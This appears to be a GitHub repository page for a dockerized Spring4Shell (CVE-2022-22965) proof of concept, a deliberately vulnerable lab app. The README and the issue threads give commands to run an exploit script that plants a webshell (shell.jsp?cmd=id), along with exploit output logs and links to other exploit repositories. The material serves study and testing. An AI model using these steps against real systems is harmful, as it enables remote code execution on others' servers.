Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit

Overview

Spring4Shell PoC Application

This is a dockerized application that is vulnerable to the Spring4Shell vulnerability (CVE-2022-22965). Full Java source for the war is provided and modifiable, the war will get re-built whenever the docker image is built. The built WAR will then be loaded by Tomcat. There is nothing special about this application, it's a simple hello world that's based off Spring tutorials.

Details: https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities

Having issues with the POC? Check out the LunaSec fork at: https://github.com/lunasec-io/Spring4Shell-POC, it's more actively maintained.

Requirements

  1. Docker
  2. Python3 + requests library

Instructions

  1. Clone the repository
  2. Build and run the container: docker build . -t spring4shell && docker run -p 8080:8080 spring4shell
  3. App should now be available at http://localhost:8080/helloworld/greeting

WebPage

  1. Run the exploit.py script: python exploit.py --url "http://localhost:8080/helloworld/greeting"

WebPage

  1. Visit the created webshell! Modify the cmd GET parameter for your commands. (http://localhost:8080/shell.jsp by default)

WebPage

Notes

Fixed! As of this writing, the container (possibly just Tomcat) must be restarted between exploitations. I'm actively trying to resolve this.

Re-running the exploit will create an extra artifact file of {old_filename}_.jsp.

PRs/DMs @Rezn0k are welcome for improvements!

Credits

Comments
  • the vulnerability can not be exploited locally when it's run from the IntelliJ without using Dockerfile

    the vulnerability can not be exploited locally when it's run from the IntelliJ without using Dockerfile

    When the war file is deployed in the Docker container, the vulnerability can be exploited after running:

    1. docker build . -t spring4shell && docker run -p 8080:8080 spring4shell
    2. python3 exploit.py --url "http://localhost:8080/helloworld/greeting"
    3. go to http://localhost:8080/shell.jsp?cmd=id

    However, if I run this Spring Boot web app locally from IntelliJ (BTW, I had to add server.servlet.context-path=/helloworld in application.properties file) and try these steps:

    1. python3 exploit.py --url "http://localhost:8080/helloworld/greeting"
    2. go to http://localhost:8080/shell.jsp?cmd=id I've just got "HTTP Status 404 – Not Found" with http://localhost:8080/shell.jsp?cmd=id

    Can someone shed the light on why the vulnerability can't be exploited when it's run locally from IntelliJ?

    opened by idavollen 2
  • Getting status code 500

    Getting status code 500

    I'm getting status error code for some reasone

    [] Resetting Log Variables. [] Response code: 500 [] Modifying Log Configurations [] Response code: 500 [] Response Code: 200 [] Resetting Log Variables. [*] Response code: 500 [+] Exploit completed [+] Check your target for a shell [+] File: shell.jsp [+] Shell should be at: http://localhost:8080/shell.jsp?cmd=id

    opened by mikiputermy 2
  • fix dockerfile to contain a vulnerable version of tomcat and pin it

    fix dockerfile to contain a vulnerable version of tomcat and pin it

    Pushes to the Tomcat docker images have made it so the exploit fails. I have changed the version to a recent, but still vulnerable base image. I have also mirrored the image so that this doesn't happen again.

    opened by breadchris 2
  • Question about reproduction

    Question about reproduction

    Hey @reznok, awesome work!

    I was wondering if having the Model and @ModelAttribute are required to be susceptible to the exploit? Often, a Controller is annotated with @RestController and looks more like:

    @RestController
    @RequiredArgsConstructor
    public class MyRestController {
        
        @NonNull private final MyService myService;
     
        @GetMapping(value = REQUEST_PREFIX + "/path/{somePathVariable}/items")
        public List<SomePojo> someGetRequest(@PathVariable Integer somePathVariable, @RequestParam(value = "itemIds") Set<UUID> itemIds) {
    	    return myService.getSomePojos(somePathVariable, itemIds);
        }
    }
    

    my question in short is:

    Is this exploitable @RestController with @PathVariable, @RequestParam? Or only for Model and @ModelAttribute as it's in your example repo?

    opened by lc-nyovchev 2
  • unable to post the exploit to server

    unable to post the exploit to server

    facing this issue

    python3 exploit.py --url "http://localhost:8080/helloworld/greeting" [*] Resetting Log Variables. [*] Response code: 500 [*] Modifying Log Configurations [*] Response code: 500 [*] Response Code: 200 [*] Resetting Log Variables. [*] Response code: 500 [+] Exploit completed [+] Check your target for a shell [+] File: shell.jsp [+] Shell should be at: http://localhost:8080/shell.jsp?cmd=id

    Please let me know if there is any solution for this. Thanks.

    opened by swarup14 1
  • Confirmed reproduction

    Confirmed reproduction

    I just want to comment here I can reproduce it using the Docker image. ...which is kind of scary itself.

    I tried to reproduce it on some other system with another java/tomcat/webapp closer to a production app of mine and it didn't work there out of the box... still investigating.

    opened by dagnelies 1
  • Replace blog post + refactor CLI

    Replace blog post + refactor CLI

    Some minor refactoring of the CLI to explain what the magical string is.

    Remove dependency on docker-compose.

    The referenced blog post from Cyber Kendra initially contained click-bait content to draw traffic to the site and now it contains copy and pasted, uncited content stitched together.

    https://twitter.com/wdormann/status/1509373584883523586

    Full disclosure, my team wrote the linked blog post and has been our full time job for the past couple of days keeping this updated with community information.

    opened by breadchris 1
  • Error when attempting exploit

    Error when attempting exploit

    Love this project! Thank you.

    I am running into the following issue however when following your README:

    1. load per the instructions
    2. python3 exploit.py --url "http://localhost:8080/helloworld/greeting"
    3. curl http://localhost:8080/shell.jsp?cmd=id

    leads to the below stack trace in the shell where I started the project with sudo docker run -p 8080:8080 <image>

    Any guidance you have is appreciated.

    2022-04-03 03:19:30.775 ERROR 1 --- [nio-8080-exec-5] o.s.b.w.servlet.support.ErrorPageFilter  : Forwarding to error page from request [/greeting] due to exception [Invalid property 'class.module.classLoader.resources' of bean class [java.lang.Module]: Could not instantiate property type [org.apache.catalina.WebResourceRoot] to auto-grow nested property path; nested exception is java.lang.NoSuchMethodException: org.apache.catalina.WebResourceRoot.<init>()]
    
    org.springframework.beans.NullValueInNestedPathException: Invalid property 'class.module.classLoader.resources' of bean class [java.lang.Module]: Could not instantiate property type [org.apache.catalina.WebResourceRoot] to auto-grow nested property path; nested exception is java.lang.NoSuchMethodException: org.apache.catalina.WebResourceRoot.<init>()
    	at org.springframework.beans.AbstractNestablePropertyAccessor.newValue(AbstractNestablePropertyAccessor.java:923) ~[spring-beans-5.3.15.jar:5.3.15]
    	at org.springframework.beans.AbstractNestablePropertyAccessor.createDefaultPropertyValue(AbstractNestablePropertyAccessor.java:887) ~[spring-beans-5.3.15.jar:5.3.15]
    	at org.springframework.beans.AbstractNestablePropertyAccessor.setDefaultValue(AbstractNestablePropertyAccessor.java:874) ~[spring-beans-5.3.15.jar:5.3.15]
    	at org.springframework.beans.AbstractNestablePropertyAccessor.getNestedPropertyAccessor(AbstractNestablePropertyAccessor.java:846) ~[spring-beans-5.3.15.jar:5.3.15]
    	at org.springframework.beans.AbstractNestablePropertyAccessor.getPropertyAccessorForPropertyPath(AbstractNestablePropertyAccessor.java:820) ~[spring-beans-5.3.15.jar:5.3.15]
    <snip>
    
    opened by aaronhmiller 0
Owner
Brandon Forbes
Offensive Security Professional
Brandon Forbes
Spring4Shell Proof Of Concept/And vulnerable application CVE-2022-22965

Spring4Shell-POC (CVE-2022-22965) Spring4Shell (CVE-2022-22965) Proof Of Concept/Information + A vulnerable Tomcat server with a vulnerable spring4she

Daniel Christensen 304 Nov 23, 2022
Spring4Shell - Spring Core RCE - CVE-2022-22965

Spring Core RCE - CVE-2022-22965 After Spring Cloud, on March 29, another heavyweight vulnerability of Spring broke out on the Internet: Spring Core R

Malte Gejr 115 Nov 15, 2022
ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065)

ExProlog ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065) Usage: exprolog.py [OPTIONS] ExProlog -

Herwono W. Wijaya 129 Nov 11, 2022
CVE-2022-22965 - CVE-2010-1622 redux

CVE-2022-22965 - vulnerable app and PoC Trial & error $ docker rm -f rce; docker build -t rce:latest . && docker run -d -p 8080:8080 --name rce rce:la

Duarte Duarte 20 Aug 25, 2022
log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

说明 about author: 我超怕的 blog: https://www.cnblogs.com/iAmSoScArEd/ github: https://github.com/iAmSOScArEd/ date: 2021-12-20 log4j2 dos exploit log4j2 do

null 3 Aug 13, 2022
Spring-0day/CVE-2022-22965

CVE-2022-22965 Spring Framework/CVE-2022-22965 Vulnerability ID: CVE-2022-22965/CNVD-2022-23942/QVD-2022-1691 Reproduce the vulnerability docker pull

iak 4 Apr 5, 2022
CVE-2022-22965 : about spring core rce

CVE-2022-22965: Spring-Core-Rce EXP 特性: 漏洞探测(不写入 webshell,简单字符串输出) 自定义写入 webshell 文件名称及路径 不会追加写入到同一文件中,每次检测写入到不同名称 webshell 文件 支持写入 冰蝎 webshell 代理支持,可

东方有鱼名为咸 53 Nov 9, 2022
Everything I needed to understand what was going on with "Spring4Shell" - translated source materials, exploit, links to demo apps, and more.

springcore-0day-en These are all my notes from the alleged confirmed! 0day dropped on 2022-03-29. This vulnerability is commonly referred to as "Sprin

Chris Partridge 105 Nov 26, 2022
AnonStress-Stored-XSS-Exploit - An exploit and demonstration on how to exploit a Stored XSS vulnerability in anonstress

AnonStress Stored XSS Exploit An exploit and demonstration on how to exploit a S

صلى الله على محمد وآله 3 Jun 22, 2022
Details,PoC and patches for CVE-2021-45383 & CVE-2021-45384

CVE-2021-45383 & CVE-2021-45384 There are several network-layer vulnerabilities in the official server of Minecraft: Bedrock Edition (aka Bedrock Serv

null 20 Apr 7, 2022
聚合Github上已有的Poc或者Exp,CVE信息来自CVE官网。Auto Collect Poc Or CVE from Github by CVE ID.

PocOrExp in Github 聚合Github上已有的Poc或者Exp,CVE信息来自CVE官网 注意:只通过通用的CVE号聚合,因此对于MS17-010等Windows编号漏洞以及著名的有绰号的漏洞,还是自己检索一下比较好 Usage python3 exp.py -h usage: ex

null 553 Nov 29, 2022
CVE-2022-21907 - Windows HTTP协议栈远程代码执行漏洞 CVE-2022-21907

CVE-2022-21907 Description POC for CVE-2022-21907: Windows HTTP协议栈远程代码执行漏洞 creat

antx 365 Nov 30, 2022
CVE-2022-22536 - SAP memory pipes(MPI) desynchronization vulnerability CVE-2022-22536

CVE-2022-22536 SAP memory pipes desynchronization vulnerability(MPI) CVE-2022-22

antx 49 Nov 9, 2022
Cve-2022-23131 - Cve-2022-23131 zabbix-saml-bypass-exp

cve-2022-23131 cve-2022-23131 zabbix-saml-bypass-exp replace [zbx_signed_session

东方有鱼名为咸 136 Nov 30, 2022
CVE-2022-21907 Vulnerability PoC

CVE-2022-21907 Description POC for CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability. create by antx at 2022-01-17, just some sm

Michele 16 Nov 13, 2022
POC for CVE-2022-1388

CVE-2022-1388 POC for CVE-2022-1388 affecting multiple F5 products. Follow the Horizon3.ai Attack Team on Twitter for the latest security research: Ho

Horizon 3 AI Inc 230 Dec 1, 2022
CVE-2022-22963 PoC

CVE-2022-22963 CVE-2022-22963 PoC Slight modified for English translation and detection of https://github.com/chaosec2021/Spring-cloud-function-SpEL-R

Nicolas Krassas 102 Nov 9, 2022
DNSpooq - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)

dnspooq DNSpooq PoC - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685) For educational purposes only Requirements Docker compo

Teppei Fukuda 80 Nov 28, 2022
Exploit and Check Script for CVE 2022-1388

F5-CVE-2022-1388-Exploit Exploit and Check Script for CVE 2022-1388 Usage Check against single host python3 CVE-2022-1388.py -v true -u target_url At

Andy Gill 51 Oct 29, 2022